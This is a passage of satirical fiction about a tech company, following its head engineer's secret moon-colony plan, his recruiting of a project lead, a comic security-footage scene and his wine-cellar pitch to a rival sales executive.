Project Y was just that — beyond its time, beyond any earthly concept of innovation. By that measure alone it would have failed in a normal environment. But Anahata now had what Gregor then lacked: boundless capital, a deep pool of engineering talent, and the power of a large country. Moreover, there was no public opinion standing in the way of Y. Its secrecy had been closely guarded, and Gregor was determined to keep its existence quiet until it was too late to be stopped.
Instead, the hurdle Gregor now found before him was a far more potent nemesis: the devil himself, Niels Smeardon, breathing fire and online advertising in the path of Gregor’s engineering team.
Niels was the reason two Project Y product managers had come to Gregor’s office that afternoon.
“For the past week, we’ve literally been twiddling our thumbs,” one said. “Every step we take is blocked by sales. We go left, there they are. We go right, there they are.”
“And why can’t you dart around them?” said Gregor, annoyed by the metaphor and his part in it.
“For example, we’re ready to run a simulation of Y at Shanley Field. But sales has the field all booked up for the next six weeks with various internal conferences — ”
“Motivational Go! Fight! Sell! conferences. Conferences…with PowerPoint,” spat the other product manager.
“Also, we need to be able to turn off advertising in one part of the world to free up some servers for Y testing. It would just be a low-volume region that we’d turn off, like Eastern Africa, but sales refuses. I was told it was escalated to Niels and he stopped the whole thing, saying the entire world deserves to benefit from Anahata advertising and that under no condition should Eastern Africa not receive our glorious ads for even a single day.”
Gregor snorted. He looked out onto the field below his office, where a group of sales employees were playing rugby. These were the men who sold Anahata’s internet ads — pithy phrases and punchy slogans advertising cruise ships and cancer treatments. They believed in dress shirts and strip clubs and golf and triathlons. He was sure he could see Niels among them, dressed in one of his shiny custom jerseys, kicking up mud clods simply to remind the earth of his dominance.
“I will fix the Niels problem,” said Gregor, steadying his voice and watching Niels’ spiky blond hair attack the sky as he ran down the field. The two product managers would never have guessed that Gregor’s body was raging inside, his blood cells taking up arms, their spears pricking the subcutaneous layer of his skin, ready to fight.
“Anything else?” he asked, turning to the two men.
“Things are still very quiet in the rest of the engineering community. The distractions have worked really well.”
Gregor nodded. When planning Project Y, he and Bobby had devised a list of “distractions” — projects like Social Car and Genie — that if leaked would capture internal, public, and media attention and let the Y engineers continue to work in secrecy on the company’s big bet.
“Go back to work, and don’t worry about this anymore.”
The duo left smiling.
Gregor remained by the window, watching the field. To any other observer, Niels might have seemed the ultimate captain, rallying his team to the win, throwing slaps and high-fives. But it was all an act. Niels was a man willing to knock down anyone who got in his way. Gregor had kept Project Y a secret from him for this very reason. Niels would destroy it for the very fact that it was Gregor’s baby. And if Niels succeeded in sabotaging Y, it would be the end of everything.
The problem was that Gregor had no power over Niels. They were equals, if not in brain power, then at least according to Anahata’s organizational chart. Only Bobby could tell Niels what to do. And while Gregor and Bobby dreamed up the idea for Project Y together, the founder had since taken a step back, tasking Gregor with making it a reality. This would have been fine were it not for the fact that Bobby seemed to have a weird affection for Niels, never suggesting that he really liked the guy, but also taking care to protect him from Gregor. He had even heard that Bobby and Niels occasionally did yoga together.
Gregor paced his office, Niels’ gravelly voice and sales aphorisms trailing behind him: “With courage comes determination.” “Leadership is knowing when to lead.” “Those who win are those who win.” He caught sight again of Niels on the field, this time tripping an oncoming opponent, the stunned player falling to the ground. Niels was halfway down the field before the man could even lift his face from the dirt.
Gregor needed Bobby’s help to get past Niels for good. It wasn’t simply a matter of getting a server or access to the field. Gregor needed Niels out of the picture, completely won over to the idea of Y, or contained so that he couldn’t thwart it.
He opened his messenger service. Bobby had said he would be busy much of the day at a colonics retreat but in fact seemed to be online.
Gregor: We need to talk about Y. It’s behind schedule. There are roadblocks.
Bobby: You should come to colonics retreat. Good for removing roadblocks.
Gregor: These are sales roadblocks.
Bobby: Flush out roadblocks.
Gregor: Do I have your permission to do whatever it takes?
Bobby: Small things cloud the big ideas, threaten rain. At retreat now. Can’t talk.
Bobby’s online indicator switched off.
Gregor sighed and leaned back in his chair. He stared out the window for a long time without moving, the sky above him clouding with dark thoughts.
The four leaders of Gregor’s “distractions” projects were all longtime Anahatis. Any one of them could be trusted to help recruit the army of engineers Bobby had requested.
Which is how Gregor ended up in one of the company parking lots, the key to a driverless car in his hand. Nose upturned, he held the car key several inches away from his body. He believed keys were an outdated method of accessing one’s property, which was why he had an engineering team working on a simple identification solution that would require just a small incision in an individual’s pinky.
Gregor unlocked the door and settled into the front seat.
An unfamiliar beep boop beep came from the dashboard, and five red lights flashed in the center console as the Social Car software booted up. Soon, the dashboard glowed HAL-like in the early light of evening.
“Welcome to Social Car,” a female voice said. The dashboard flashed again, and Gregor was presented with a series of options on a large screen in the center console:
I want to meet…
- man [specify age]
- woman [specify age]
- programmer [specify which languages]
- designer
- venture capitalist
- engineers
- other
Why would he want to meet someone?
“Other,” Gregor muttered.
Two faces, numbered “1” and “2,” popped up on the screen. Gregor didn’t recognize them but assumed they were the pictures of Social Car team members.
“Number 1,” he said.
“Sven Svensson is a quarter-mile away,” the voice said. “Shall I read you his profile?”
Gregor had no interest in getting to know his employees. The better he knew them, the harder it was to eventually fire them.
“Just drive me to Technology Way.”
“Driving to Technology Way,” the woman’s voice confirmed.
After yielding to two other cars, Anahata’s driverless car made its way out of the parking lot.
“There are three people near you now,” the voice said as the car turned onto Processor Street.
Gregor’s eyes flicked to the dashboard. Now a third, more familiar face stared back at him. He recognized Roni Herman, the team lead. Roni was a bit past his prime, already in his early thirties, but still a well-liked figure on campus. In reviewing the distraction projects and their leaders that morning, Gregor had thought Roni could be an interesting candidate to join the Project Y team.
“Take me to Roni Herman.”
The software beeped its assent, and a few minutes later, Gregor’s car pulled alongside Roni’s.
“Speak to Roni,” Gregor said. The dashboard beeped and a moment later confirmed that Roni had accepted the communication.
“Hello, Gregor, hello!” Roni’s eager, nasal voice filled Gregor’s car. “How do you like Pad Thai?”
“What?” Gregor never ate Thai food. He didn’t like the feeling of spice running through his body, raising his body temperature.
“You know, Pad…Thai,” Roni repeated. Gregor glanced over at Roni’s car, which was keeping perfect pace with his own. Roni climbed into the back of his car, searching for something. A moment later, he put a piece of paper against the window. On it was written in big black letters: “PAD THAI=SOCIAL CAR CODE NAME.”
“What would happen if I were to pull you off Social Car?” Gregor asked.
Roni didn’t answer immediately. Although Gregor refused to make eye contact, he imagined Roni was panicking, afraid he was about to be kicked off his project. Although Gregor volunteered at a community garden, gave millions each year to humanitarian crisis organizations, and voted only for socialists, he did like to cause a bit of microsuffering now and then. He felt it kept the engineers on their toes.
“Oh, well, you know, I don’t know how things would go if I came off it,” said Roni, the panic painted across his face in bold pinkish strokes. “I’ve really led the team from the start and — ”
Gregor frowned. In a company where sales strutted with their chins to the clouds, Gregor preferred the men who slouched. Roni could at least display a bit of faux humility.
“Slow down,” Gregor told his car. He’d ditch Roni and go talk to the Genie team lead instead.
But Roni’s car slowed to keep pace with Gregor’s.
“Pretty great, right?” Roni said. “That’s the speed-detection system we built this week. You can try to slow down, but my car will slow with yours so we can keep chatting. We’ve still got some bugs to work out, but I’m confident we’ll launch before the end of the quarter.”
What?!
The end of the quarter was far too soon for a Social Car launch. Gregor needed all of his distractions running up until Project Y was ready. He couldn’t kill this project — it was too well known and popular on campus — but he certainly couldn’t let it launch anytime soon. He needed to slow it down — like by removing Roni from Social Car and making him his Y evangelist. Gregor inhaled deeply.
“Have you heard of Project Y?” he asked.
Roni gasped. “I’ve heard…things, you know, but not all the details.”
“It’s our best shot at building the world’s greatest company. And the most important thing right now is for us to have strong leaders. People who can motivate others. People who can help articulate a vision.”
Out of the corner of his eye, Gregor saw Roni bouncing in his seat. “At many times during my career I’ve shown leadership and created visions and — ”
“Your vision isn’t required,” Gregor said. “What you’ll need to do is spread the word, win people over, recruit new team members — and eventually spread the project to all of Anahata’s engineers.”
“I organize the quarterly hackathon,” Roni said. “We now have 2,000 Anahata engineers around the world who code the entire weekend over a livestream feed in exchange for beer.”
“That’s what we’re looking for,” Gregor said. “It’s a big job. It’s historic. I need you to move over to Building 1 ASAP.”
“Building 1? Oh, yes! I won’t let you down!”
Gregor gave a small nod from his car.
“Oh, oh, one thing,” Roni said. “What do you want me to do about Pad Thai? Will you find a new leader for it?”
“I’ll find someone new. Don’t tell anyone where you are going or what you are working on.”
“I’ll get going right away!” Roni waved as his car turned and sped back toward campus. Soon he disappeared from Gregor’s dashboard altogether.
“Take me to Innovation Drive,” Gregor told his car.
As the car reversed course, Gregor contemplated how best to hinder Social Car. Putting a new technical lead on the project would undoubtedly slow it down. But he needed to throw a real wrench in the works, not simply lose a few weeks’ time as someone new got up to speed.
Gregor continued to wrestle with the problem as his car made its way down El Camino Real, a street that stretched the length of Silicon Valley in an endless loop of Mexican restaurants (Casa Fiesta, Casa Grande, Casa Lupe), energy-efficient cars, and boxy computer stores. Gregor found the relentless monotony and disinterested aesthetics pleasing.
The car passed under a billboard for Mr. Fixit, a local computer-repair service. Gregor glanced up at the tongue-in-cheek, 1950s-style image of a desperate housewife ripping her hair out as a confident Mr. Fixit repaired her computer and saved the day.
Gregor rolled down the window and craned his neck to see the ad. He ordered his car to do a U-turn. The car drove past the sign again, and then once more.
By the time he passed the sign for the third time, Gregor had the answer to his problem.
“Take me back to Anahata,” he said, “and drop me off at the lobby.”
The next morning, Gregor found himself in a place he rarely visited: the campus security control room, in Building 28. Row after row of TV screens circled the room; below them, men in matching purple polo shirts manned a dashboard of flashing red lights.
It appeared high-tech, but the reality was more panopticon of the banal. On one screen, a sales employee pulled his Porsche into the Anahata parking lot, straightening his tie in the reflection of the car window. Above him, two women did yoga on the lawn. On another screen, an aerial shot captured cubicle after cubicle of workers staring at their computers.
The cameras recorded this routine and hundreds like it each day. It was a wonder that they could even keep their lenses open given how mind-numbingly boring Anahata’s security scene was, particularly during the night shift. In the wee hours of morning, nothing went into Anahata and nothing came out — minus the occasional nocturnal engineer. Otherwise the place was locked down with the tightest security in the Valley. There hadn’t been an attempted theft in more than five years.
But that morning, there had been a break-in at Building 1 — the highest-security spot on Anahata’s campus — prompting Gregor to dash out of the management meeting and make a beeline for the security office.
Footage from three a.m. showed a man dressed entirely in black sneaking across the Building 1 parking lot, hovering on tiptoe like a thuggish ballerina. He jumped behind a tree, rolled through the grass, and ended up at the building’s side entrance, where he pulled out an Anahata badge that had likely been swiped from a negligent engineer.
The man again raised the stolen badge to the access control reader, and for a second, the camera caught a shot of his face. He was Caucasian but looked more like a zebra, with black zigzags painted across his face.
Inside, he went past the molecular lab, the welding shop, the hard-hat zone, and the physical and intangible infrastructure teams, and then stopped in front of another office.
The man darted his flashlight around the room, splashing the walls with light. It was difficult to make out what he was doing, but from the shadows it seemed he had stopped in front of a desk and was pulling something out of his bag. The flashlight swung again. Suddenly, the scene was illuminated: The man was plugging a computer into a wall outlet.
“Galt!” Gregor gasped. This was nothing less than corporate espionage. The thief was going to plant something — maybe surveillance equipment or tampered data — then use it to gain access to all of Anahata’s network.
Then the thief sat down and put his feet up on the desk.
“Wait…what is he doing?” asked Gregor, crouching to put himself at eye level with the screen.
“Sir, after watching this many times, I’ve come to the conclusion that he is picking his nose,” said one of the guards, freezing the tape for a moment to show the faint outline of a finger moving toward the man’s face.
“What?” Gregor drew even closer, his face now just inches from the screen. He signaled to the guard to continue the footage.
The thief jumped up from the chair and turned off his flashlight. Within thirty seconds, he had crept out the back exit, barrel-rolled across the parking lot, unlocked a car, and driven off. One of the guards rewound the footage and froze it on the last full shot of the man’s face, little more than a black-and-white blur.
Although the security team had already watched the tape thirty times that morning, their collective adrenaline rose as they watched Gregor’s face for a reaction. They hadn’t seen this much excitement since an engineer’s pet boa had gotten loose on campus the previous month.
“Whose badge did he use to break in?” Gregor said finally.
The security head double-checked a pad of paper on the desk. “Someone named Roni Herman, who works in Building 7. As of yesterday, Roni Herman’s badge was cleared for access to Building 1. The perpetrator was probably tracking Roni the whole time, somehow got hold of his badge, and then got access to both buildings. This was probably the result of months of tracking and shadowing his movements. Should we call the police?”
Gregor stared at the face frozen on the screen, a black zigzag casting a lightning bolt from the man’s forehead to his neck. “Idiot,” he muttered, staring at Roni’s face on the screen.
Gregor stood.
“Idiots,” he said loudly, looking at the security team. “There is no need to call anyone.”
He turned on his heel and clomped out the door.
The security team looked at each other and shrugged.
“Man, I will never understand engineers,” said one, shaking his head before switching his attention to the cameras trained on the well-endowed girls in the customer support department.
Niels began each day with a run. The Northern California air was just crisp enough to feel clean and pure, and the occasional headwind produced a surmountable challenge — the kind of easy and achievable goal-setting that Niels liked for warming up to his workday. He followed his workout with a long shower, the rainforest setting gently splattering purified water on his head while a speaker piped in a soothing recording of a woman’s voice appraising each inch of his body.
Your muscles are so big.
Your abs are very flat.
Your Adam’s apple is prominent but tasteful.
But that morning, Niels could focus only on Gregor Guntlag. The overly German German had hated him since day one and seemed intent on turning Bobby against him.
Bobby and Gregor were both nutjobs as far as Niels was concerned, but he was used to working with crazies. Fifteen years of working in the Valley and he had never worked for a CEO or founder who wasn’t a sociopath or narcissist. They thought the world’s problems existed in part to keep them intellectually stimulated, and that all those problems — malaria, corruption, congressional deadlock, death, you name it — could be solved by technologists. Their lack of focus was confused for genius. One moment they would be asking the entire company to dramatically change course, and the next moment they’d be giving equal attention to the color of the lampshades in the lobby. And despite their staunch atheism, they all believed their success was somehow mythically predestined.
It was an absurd worldview, but one that Niels admired for its selfishness. Managing and manipulating these egomaniacs was an art he felt he had perfected.
With persistence and patience, Niels had worked on Bobby for six years, helping him understand that Anahata needed money to be successful and that Niels was the best lever he had to produce it in large quantities. As a result, Bobby generally left him alone. Gregor, on the other hand, had been less susceptible to Niels’ charm. He did everything he could to sabotage Niels, always playing the contrarian in any management meeting and sending out his engineering lackeys to turn off a sales production task here and there. It was nothing sufficiently significant to warrant an outcry to Bobby, but just enough to annoy Niels and make clear that Gregor and his foot soldiers were behind the job.
So Niels was surprised by the peace offering that had appeared the previous night in the form of a blue chat bubble on his phone — a chat message from Gregor asking him to come over to “work things out and bury the hatchet.”
It was a shocking olive branch from Anahata’s head engineer, and in retrospect, Niels realized he should have taken a screenshot of their exchange. Unfortunately, since Anahata chats were not stored (the result of Gregor and Bobby’s joint paranoia about government surveillance), this historic exchange of civilities would have no record.
After an evening spent trying to discern Gregor’s motives, Niels had finally replied that, yes, of course he’d be happy to talk. But the whole thing smelled fishy. Perhaps Gregor wanted something that belonged to sales. If that was the case, it meant that Niels had already achieved Master Negotiator Rule #1: Always have the upper hand. (Viewing even the most casual encounters as an opportunity for personal gain was key to Niels’ life philosophy. An ex-girlfriend had once accused him of dealing with their relationship like a business negotiation. Niels said he didn’t understand how she could possibly think that anything in life was not a negotiation. He came away triumphant, although the woman did break up with him shortly thereafter.)
Niels was confident he could work the meeting to his advantage. In fact, this could be the opening he needed to get Gregor to agree to put ads on Moodify bracelets.
In any other company, the management team would have salivated over the Moodify bracelets, with one billion dollars in projected profit in the first year alone. But not Gregor Guntlag, whose perennial argument against anything Niels wanted was that it wouldn’t be good for Anahata users. Niels believed that not giving people advertisements was bad. If they didn’t know something existed, how could they know they needed it? Only advertising could tell people what they needed to need.
Typically, Bobby hadn’t even listened to the discussion. He caught just the tail end of Gregor’s rebuttal and seemed to defer the decision indefinitely with a wave of his hands. If you asked Niels, Bobby gave his head engineer far too much rope. Gregor was holding the company back from billions of additional revenue. And what did he do to make up for it? As far as Niels could tell, Gregor was simply there to execute Bobby’s big ideas. All of Gregor’s own projects had been massive failures. He was good at implementation but had no vision of his own.
Niels stepped out of the shower and surveyed himself in the bathroom mirror. He was forty-two but didn’t show a single gray hair or wrinkle. By almost any measure, he was the picture of excellence in aging. He gave a quick, indulgent flex of his muscle and a flash of bleached teeth. He remembered that the Anahata employee he banged a few weeks back had commented on his nice smile. He racked his brain for a split second, trying to remember her name. She was that sexy hippie receptionist who kept asking him for career advice as he tried to take her clothes off. Janine. Jane. Jennie. It didn’t matter. It was probably a bit stupid to hit on someone who worked at Anahata, but he wasn’t going to worry about it. He always could have her fired if things got uncomfortable. So far, he hadn’t even run into her on campus.
Niels threw on his favorite Prada slacks — the ones he wore to close a deal — and finished getting dressed for work. He took a final look in the mirror and flashed his teeth. Never underestimate the power of a killer grin.
Master Negotiator Rule #36: Arriving a few minutes late to a meeting communicates dominance. You will wait for me. Punctuality is for the meek.
And so, despite having changed his outfit three times — should he go business casual? slouchy engineer? weekend triathlete? — then having spent two hours circling Gregor’s neighborhood, Niels made sure not to appear at Gregor’s doorstep even a minute early.
Three minutes after the appointed time, Niels arrived at the address and did a double take. He checked the house number again: 414 Tuscany Drive. This was it.
Before him was an immense silver gate — the kind of gate that only the truly rich, and truly paranoid, possessed.
Niels pushed a button on the intercom. Someone picked up, but instead of a “hello” there was simply a buzzing sound, followed by the slow opening of the gate, revealing a long driveway abutted by row after row of towering pines.
On some level, it made sense to Niels that Gregor would live in the wealthiest neighborhood in Atherton, itself the wealthiest city in the Valley. He was, after all, one of the earliest employees at Anahata and had made billions of dollars when the company went public. But Gregor was also the man who wore faded decades-old shirts every day, ate the same bland lentils at every lunch, and drove a beat-up Jeep to work. Niels had assumed he’d eschew a fancy house and live in austerity in a small condo in crime-ridden East Palo Alto, or perhaps an inconspicuous cottage in the slightly smelly, middle-class part of Mountain View. Anything but the estate that was emerging before Niels’ eyes — a sprawling mansion the style of which Niels could only describe as nouveau-chateau, and whose inhabitants Niels would ordinarily assume to be a transplanted Texas blonde and her bejeweled poodle.
The house was ostentation at its American best, its climbing spires and ornate Mediterranean palacio flourishes the odd manifestation of new money’s dream of old Europe. At the end of the driveway was a large marble fountain — six white swans spouting water onto a central lily pad. Rising up behind the fountain was a large marble staircase that led to the front door. Two long, peach-colored wings branched out from the entrance, each ending in a tall, Rapunzel-like tower.
Gregor was waiting for him at the top of the marble steps, dressed in his typical uniform of white T-shirt, khaki pants, and combat boots. In his hand he held two beers, one of which was immediately thrust at Niels, as if Gregor was following a textbook instruction on how to relate to American men. The beer was warm, likely pulled from the pantry just minutes before. Even if this was all just a plot to get something out of him, at least the guy was making an effort. And in any case, it was kind of fun to witness Gregor’s visible discomfort in his role as host.
If the garish exterior of Gregor’s palace had thrown Niels’ preconceptions, the interior only reaffirmed them. Once inside, Niels could see nothing in the house beyond white walls and a single overhead light in each room. The few windows in existence were so high up from the floor that they reminded Niels of a cathedral…or a prison. There was no artwork, no photographs, no sign of a woman, pet, plant, or any possible sign of life.
“You’re not one for decorating, are you?” said Niels, turning to Gregor with a smile designed to communicate friendliness.
“I like simplicity,” Gregor said. “I don’t really like…things.” The word lingered in the air between them.
“Except for an enormous house,” Niels smirked.
“I only bought a large house so as to have a strong fortress in the event of an anthropogenic risk,” Gregor replied.
“An anthropo-what?”
“Hostile artificial intelligence, nuclear holocaust, fossil energy exhaustion, the collapse of everything.”
“Ha ha…oh…”
Niels stifled his laugh; Gregor wasn’t kidding. The engineer’s face was as smooth as his walls, giving up nothing. He seemed to be staring at an imaginary spot just past Niels’ shoulder, avoiding eye contact.
“You like wine,” Gregor said.
“I do.”
“Fischer said you took him on a wine tasting in Napa a few years ago.”
“I didn’t know you liked wine,” Niels said. “I would’ve invited you along.”
“No, you wouldn’t have,” Gregor said. “And if you had, I would have said no. We aren’t friends.”
Niels coughed. Being a salesman, he wasn’t used to such direct displays of honesty.
Gregor’s eyes briefly flicked away from the wall, settling on Niels’ shoulders. “Do you want to see my wine cellar?”
Gregor led him down a white hall and through a massive, empty kitchen, at the far end of which was a wide, floor-to-ceiling steel door. Gregor pushed a button, and the door slowly slid into the wall, revealing a flight of stairs leading into darkness. In the seconds before their descent, Niels recalled an article he once read in a tech magazine, in which a successful Valley engineer kept a dungeon underneath his home, holding secret orgies while his nuclear family, clothed in matching pastel cottons, lived happily and unknowingly in the rooms upstairs.
But when Gregor turned on the lights, the illuminated space below revealed nothing more than a simple wine cellar, with row after row of bottle racks, and in the center, two chairs and a wooden table. Atop the table was a decanter filled with wine, and next to it, an empty bottle.
Instead of a toast, Gregor spent thirty minutes detailing each wine purchase at length: how much it had cost, what was said about the vintage, and when he was planning to open a particular bottle. He had built an elaborate wine management system that scanned the bottle’s label, then input each detail — including age, composition, and position in the wine cellar — into an algorithm that determined the ideal “drink date.” When the date approached, Gregor was sent a notification at two-week, one-week, day-of, and then hourly intervals, alerting him of the impending deadline.
“One time I received a notification while on a course of antibiotics,” said Gregor, leaning in just slightly and lowering his voice. “I had this bottle I needed to drink and was worried it was going to go bad. I had to save it until I was well again. It was very upsetting.”
“You don’t have to drink the bottle right that very same day. It’s not like milk.”
“But then I would get no benefit from such a complex system,” Gregor said.
He grabbed the bottle of wine from the wooden table and passed it to Niels, who let out a low whistle of appreciation. It was a Chateau Margaux — the holy grail of red wine. Niels couldn’t help but grin. He was going to crush his enemy at the negotiating table while trying one of the world’s most highly regarded wines.
Niels believed that learning to appreciate wine was an apprenticeship akin to golf — at first difficult to acquire, but then indispensable for business and generally agreeable as a pastime. And he had, in fact, come to love the taste of it. Chateau Margaux was a real bragging right, and he had never held its deep ruby on his tongue.
Niels sat down on an uncomfortable wooden chair. One of the spindles was split in the middle, and the raw edge pushed into his spine. He suspected Gregor had never been inside a home furnishings store in his life, that he didn’t see the inconsistency in offering up one of the world’s most expensive wines in such a dank and uncomfortable setting. For all his engineering brilliance, Gregor would never even have made it past the sales team’s entry-level “Hospitality & Negotiation” training course.
Gregor poured the wine from the decanter and handed a glass to Niels. The men studied the wine and took in the aroma, each eying the other over his glass.
But the deep tones of the Chateau Margaux transformed them. Niels loosened his tie, Gregor slouched just slightly in his chair. It was an exceptional wine. And after they took their first sip, Niels had the sudden realization that this was the first nondisagreeable experience the two had shared since Niels joined Anahata six years earlier. Gregor even tried to offer a slight smile, pushing it onto his face as though it were a heavy wooden beam. But at least he was trying.
Niels did not say a word — Master Negotiator Rule #33: Approach silence like a battlefield. He who speaks first shows his hand.
Niels sipped his wine slowly but decisively. He imagined his Adam’s apple bulging then receding, like a heaving warrior ready to break through enemy lines. A warrior with rippling abs and a weathered loincloth that barely covered his forceful manhood. He could crush this wine glass with just a slight clenching of his fingers. It would shatter at his feet, taking with it all of Gregor’s dreams and —
“Do you read any philosophy?” Gregor asked.
“Not really,” Niels said. “I mean, college, but that was a long time ago.”
“I thought so,” said Gregor.
Niels wanted to tell Gregor that he had graduated summa cum laude in economics from Yale, that he had been a Rhodes scholar, that he had won a Cambridge debate on the virtues of Adam Smith — but he held back. It was best to let the conversation advance smoothly toward the negotiation point.
“For centuries,” Gregor began, “people have tried to create the perfect society. To achieve what we see flickering on Plato’s cave. To transpose the ideal on our reality.”
Niels imagined Gregor sitting on his white couch, within his white walls, reading Greek philosophers after a hard day’s work.
“Many people have tried to create a community of like-minded individuals, with the aim of a peaceful and collaborative rule — a utopia, if you will. You may recall the Rappites…?”
Niels didn’t.
“Or the Oneida community.”
Again, Niels drew a blank.
“In any case,” Gregor said, “all of these attempts ultimately failed.”
“We weren’t made to live on communes,” Niels shrugged. “People are fundamentally selfish.”
“Or…perhaps it’s just a few bad seeds.”
“A few bad seeds are enough to ruin the crop.”
“Yes, Niels!” exclaimed Gregor, his chair rocking underneath him, a flush of pink invading his face. “That’s why we get rid of the bad seeds!”
Gregor took a deep breath, and the color was sucked back into his body. He coughed, then continued.
“We know how to do it. We know how to build the perfect society.”
“On campus?”
Gregor leaned forward in his chair, putting his hand awkwardly on Niels’ shoulder. In a sharp whisper, his eyes blazing, “Niels, we’re going to the moon!”
It took Niels a few seconds to realize what he had just heard. He moved to speak, but Gregor’s hand stopped him, his words spilling over his palm and rushing at Niels.
“We’ve figured out how to build the perfect society — and from all angles, from actual technical infrastructure to the societal structure. We’ve figured it all out!”
The Master Negotiator faltered and a laugh escaped from him, rudely punctuating Gregor’s plan. Niels couldn’t help himself — with just one simple, absurd phrase, six years of intimidation had evaporated. Gregor wasn’t anyone to be afraid of. He was simply insane. And that was surely to Niels’ advantage, though he knew one had to proceed carefully with crazy people. They could be unpredictable.
“Slow down,” Niels said. “Are you joking with me?”
“We have been working on the project for a year,” Gregor said. “Fifty engineers working in secret in Building 1. We’re building a colony on the moon.”
“You mean you have a spaceship and everything? How are you dealing with gravity? Wait, never mind, don’t answer that. What I mean is, since when did Anahata get into the business of humankind?”
“Anahata has always only ever been about humankind. Everything we do is done for — “
“Yeah, yeah, I know, everything we do is to improve humankind. But I mean, a society, Gregor. There are no synergies with our current business. How do you know how to construct a society?”
“Actually, a society is a lot like software. You build it on solid principles, then you iterate. Then you solutionize, and you iterate again.”
“What makes you think you can solve what centuries of wise men have failed to do?”
“Because we have something they don’t have,” Gregor said. He pushed his chair closer, and Niels couldn’t help but lean forward. The broken wooden spindle leaned with him, pushing into his back. But he did not move to swat it away; his eyes were locked on Gregor, their faces almost touching.
“Algorithms,” Gregor whispered.
“You have got to be kidding me,” Niels snorted. “These are humans we’re talking about, not robots. You can’t predict and control human behavior with algorithms.”
“That is an emotional reaction to what is a very logical project. And, yes, an algorithm could have predicted that you would respond that way. Even irrational behavior is rational when seen as a larger grouping of patterns. And as you can imagine, this project is built on patterns of success. Project Y, we call it. It will save Anahata — and, as a result, humankind.”
Niels shook his head. He had come to ask Gregor to slap some silly ads on a dumb bracelet; Gregor was telling him they were going to build a moon colony. If Gregor wasn’t crazy, then Niels was stupid for asking for so little in return.
“Let me get this straight. We’re wasting tons of company money for a totally altruistic endeavor? There’s not a single business purpose in all of this?”
“Obviously there’s a business purpose,” Gregor said. “That’s where it all started.”
Niels smirked — now they were speaking his language. The company always talked about saving the world, and sometimes really did believe in it, but Bobby always made sure there was a monetization element involved — and that Niels was in charge of ensuring the project’s economic success.
“Tell me more,” said Niels, leaning back in his uncomfortable chair.
“Project Y is fundamentally about protecting our employees and our company from outside threats,” Gregor said.
“So this is about beating Galt.”
“And any future Galt. We have the world’s best engineers, and if we lose them, we lose everything. But if we build them a utopia, they will never have any reason to leave.”
“Don’t you think the company’s already done a pretty good job of building a worker’s paradise?” Niels said. “If anything, we’ve made all these engineers into self-entitled, smoothie-guzzling cult members who will never have any reason to leave. Where else could they have job titles like ‘Evangelist,’ ‘Security Warrior,’ ‘Protector of All Things Internet,’ and ‘Debuggenator’?”
Gregor shook his head. “It isn’t enough anymore. Free food, massages, and light-saber aerobics were revolutionary when we first started the company. But nowadays, every startup has them. The smaller companies can offer faster career mobility, wider remit, and most important, by dint of being small and under the radar, they can innovate wildly through illegality. Just think — when was the last time we were able to get away with selling a user’s private data or violate someone’s copyright? Those golden days are gone. We simply can’t compete. And Galt knows it. Everyone knows it.”
Niels couldn’t disagree. Galt was a real threat, particularly in the Valley, where the average shelf life of even the most successful tech companies was just a decade or two. Anahata was already ten years old. Practically ancient.
“So, if you build a colony on the moon…”
“The better way to state it is, if we build an isolated utopia — which just happens to be on the moon — then we will secure the future of this company. No more Galt headhunters. No more Galt stealing our great ideas.”
“And you’ll just lock the employees up there on the moon? Give them a one-way ticket?”
“Imagine — a planet full of geniuses!”
Niels shook his head. “Surely there are easier ways to do this. What about raising employees’ salaries or giving them longer vacations? Going to the moon seems extreme. I see no value add to the company.”
“Value add?” Gregor sneered. “Your statement is not made true by its redundancy. There is indeed value. It’s only by tackling what seems impossible that you can ensure no one else will do it. Galt can compete with bigger salaries and fancy perks, but they won’t be able to compete with a moon colony. Plus, we’re building a utopia that no engineer will ever want to leave. We’ll be unstoppable! All other utopian societies have failed — it’s a big problem that no one’s solved. It’s a huge opportunity for us.”
“Or the sign that we will fail like all the others,” Niels sighed. A moon colony was crazy even by Anahata standards.
“Our utopia will be different. We’ve spent several months analyzing the best combinations of political thought, philosophy, and technological advances necessary to achieve a better society. We’ve also looked at societal failures through the centuries — Rome, Byzantium, and so forth. What was consistent throughout was a lack of individual purpose. As a society progresses, it becomes more specialized, and while its citizens become ever more dependent on each other, they have no relationship with the tasks they perform. They are cogs in a wheel they never wanted to build.”
Niels remembered late-night pot-filled conversations in college that sounded a lot like this. He fiddled again with the wooden spindle digging into his back. When the first ad appeared on Moodify, he’d send Gregor a new chair as a snide gift. Nothing was more insulting to a rich man than to send him a better version of what he already owned.
“We will take the best sampling of society and give people roles that fit their skills,” Gregor continued. “The man born to be a mechanical engineer will be a mechanical engineer. He who cooks well will be a cook. There will be no anomie — I guess you don’t know the philosopher Émile Durkheim? But in any case, every man will have his place. Every man will work together, for himself and for the greater good of the group.”
Niels put one hand behind his back and began to twist at the base of the wooden spindle, trying to wrench it free from the chair. It wouldn’t budge no matter how hard he tried. He could feel the sweat forming amateurish circles under his expensive shirt.
“This goddamn chair — “
He looked up and saw Gregor studying him, expressionless.
“I mean,” Niels said, “how are you going to transport all of mankind to the moon?”
“Oh no,” Gregor said. “That would just be bringing along the bad seeds and all their earthly problems. There is a full selection process. The bulk of the group will be engineers, of course, as they perform very well across every factor we’ve determined necessary for success. You see, we have calculated a target percentage for every category of person and skill type that we need in order to have a high societal success rate.”
“Argh!” growled Niels, the spindle behaving even more egregiously than before, pushing on his spine, scratching at his well-buffed skin. Such a crappy chair had no place in his existence. He worked way too hard and earned too much money to have to sit in chairs like this.
He scooted to the edge of his chair, but the spindle followed him, digging into him, pushing him forward and downward as though he were Gregor’s supplicant. Unacceptable!
Niels leaped to his feet.
“Sit. Please,” said Gregor, leaning across and pulling the spindle out of Niels’ chair in a single, swift movement.
“As you may have guessed,” said Gregor, laying the spindle next to the bottle of wine, “sales employees won’t be as likely to be admitted to the moon colony given the high bar, but that doesn’t mean they don’t have a shot. If you help us, I can even imagine we’d raise the percentage of acceptance for the sales employees. Provided, of course, that they pass the necessary tests.”
Niels snatched the spindle from the table and pointed it at Gregor. He thought the move looked intimidating, menacing even. But then he glanced down and realized he looked more like an orchestra conductor. He threw the spindle to the ground.
“You always get so upset when I speak in a factual manner about the sales team’s IQ,” Gregor continued. “But you should listen objectively to this plan, because there’s a part that you’re going to love.”
Gregor paused, then drew out his words. “I…will…let…you…monetize.”
Niels’ eyebrows shot upward in genuine surprise.
“Monetize the moon? You’ll let me do that?”
“Yes.”
“But…you never let me monetize,” said Niels, sitting down. “What’s the catch?”
